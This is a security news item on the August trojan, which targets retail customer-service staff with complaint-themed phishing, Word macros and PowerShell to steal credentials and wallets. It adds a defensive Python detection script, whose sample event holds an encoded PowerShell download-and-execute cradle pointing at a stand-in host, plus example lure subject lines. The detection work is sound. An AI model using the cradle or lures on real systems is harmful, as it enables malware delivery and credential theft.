August Malware Attempts to Steal Credentials


In November 2016, the security company Proofpoint detected a Trojan known as August.

According to the company's researchers, August targets customer-service staff at retail firms with phishing e-mails crafted to look like customer complaints or other routine business correspondence. The infection chain relies on Word macros and PowerShell, and the final payload attempts to steal documents and user credentials from the victim's machine. Securityintelligence.com reported this on December 12, 2016.

Reportedly, many of the subject lines and lures referred to (fictitious) problems with purchases made through the retailer's website, and were aimed at staff who would plausibly be asked to look into such complaints. The lures also claimed that the attachment contained full details of the problem.

Once the document is opened, the August macro runs a series of automated checks intended to detect sandbox environments and evade security products. These checks include a query to the MaxMind IP-to-geolocation API (application programming interface), a count of files on the system, and checks of running task names and task counts.

The e-mails appeared personalized because their subject lines mentioned the recipient's domain. Examples of such subjects read "Need help with order on [recipient's domain]", "[recipient's domain] - Help: Items vanish from the cart before checkout" and "Erroneous charges from [recipient's domain]".

The attached documents carry macros that download and install the August malware. Once installed, it begins harvesting information: bitcoin wallet files, RDP and messenger credentials, FTP credentials, and passwords and cookies from Outlook, Thunderbird, Chrome and Firefox.

A separate Symantec report, "The Increased Use of PowerShell in Attacks," documents how widely this task automation and configuration management framework is now abused as an attack vector: Symantec counts 111 threat families that use PowerShell, and 95.4% of the PowerShell scripts it analyzed were malicious. This attack vector seems likely to remain in use for some time.

Given the techniques August employs, the malware is hard to spot at either the endpoint or the gateway.
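The chain described above (a Word macro launches PowerShell, which runs its environment checks and fetches the payload) is hard to catch at the gateway, but it leaves a characteristic trace in endpoint telemetry: an Office process spawning a script host. The following is an added detection example written for this page, not code from Proofpoint, Symantec or SPAMfighter. It scores constructed Sysmon-style process-creation events for that parent-child relationship, decodes any -EncodedCommand payload, and looks for the MaxMind lookup the report names alongside generic download-cradle strings. The field names Image, ParentImage, CommandLine and UtcTime are the real Sysmon Event ID 1 fields; the indicator weights, the alert threshold, the sample events and the example.invalid host are assumptions made for the example.

```python
"""Score process-creation events for an Office-macro-to-PowerShell chain.

Added example, not code from the report or the vendors named on this page.
Sample events below are constructed, not real telemetry.
"""
import base64
import re
from typing import Dict, List

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Indicator patterns matched against the raw command line and against any
# decoded -EncodedCommand script. Weights are an assumption for this example.
INDICATORS = {
    "geolocation_check": (re.compile(r"maxmind", re.I), 2),  # sandbox check named in the report
    "download_cradle": (re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", re.I), 2),
    "invoke_expression": (re.compile(r"\biex\b|invoke-expression", re.I), 1),
    "hidden_window": (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    "policy_bypass": (re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I), 1),
}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
ALERT_THRESHOLD = 4  # assumed; tune against your own baseline


def encode_for_powershell(script: str) -> str:
    """Base64 of UTF-16LE text, the format PowerShell expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> str:
    """Recover the script hidden behind -EncodedCommand; '' when there is none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: Dict[str, str]) -> Dict[str, object]:
    """Score one Sysmon-style process-creation event."""
    parent, child = _basename(ev.get("ParentImage", "")), _basename(ev.get("Image", ""))
    cmdline = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    findings, score = [], 0
    # Strongest signal: an Office application is the parent of a script host.
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        findings.append(f"office_spawns_script_host:{parent}->{child}")
        score += 4
    if decoded:
        findings.append("encoded_command")
        score += 2
    for name, (pattern, weight) in INDICATORS.items():
        if pattern.search(cmdline) or pattern.search(decoded):
            findings.append(name)
            score += weight
    return {"time": ev.get("UtcTime", ""), "findings": findings, "score": score,
            "decoded": decoded, "alert": score >= ALERT_THRESHOLD}


def analyze(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return scored results for the events that cross the alert threshold."""
    return [r for r in (score_event(e) for e in events) if r["alert"]]


# Constructed sample events. Event 0 mimics the August lure: Word launches a
# hidden PowerShell with an encoded download cradle. The rest are benign noise.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_EVENTS = [
    {"UtcTime": "2016-11-14 09:12:03",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -Enc " + encode_for_powershell(STAGER)},
    {"UtcTime": "2016-11-14 09:13:10", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Process | Sort-Object CPU"},
    {"UtcTime": "2016-11-14 09:13:40", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"UtcTime": "2016-11-14 09:14:02",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office15\OUTLOOK.EXE",
     "Image": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /n "C:\Users\cs\AppData\Local\Temp\order_issue.doc"'},
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert["time"], alert["score"], alert["findings"])
        if alert["decoded"]:
            print("  decoded:", alert["decoded"])
```

On the sample data only the first event crosses the threshold: the Word-to-PowerShell parent relationship alone scores 4, and the decoded cradle adds the download, IEX and hidden-window indicators. The scheduled backup script run from cmd.exe picks up a single point for the execution-policy bypass and stays below the line, which is the kind of legitimate administrative noise a rule keyed on PowerShell flags alone would drown in. Note that the decoder only handles the -EncodedCommand form; an August-style loader that builds its command from concatenated macro strings still shows up through the parent-child check, which is why that signal carries most of the weight.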

» SPAMfighter News - 12/19/2016
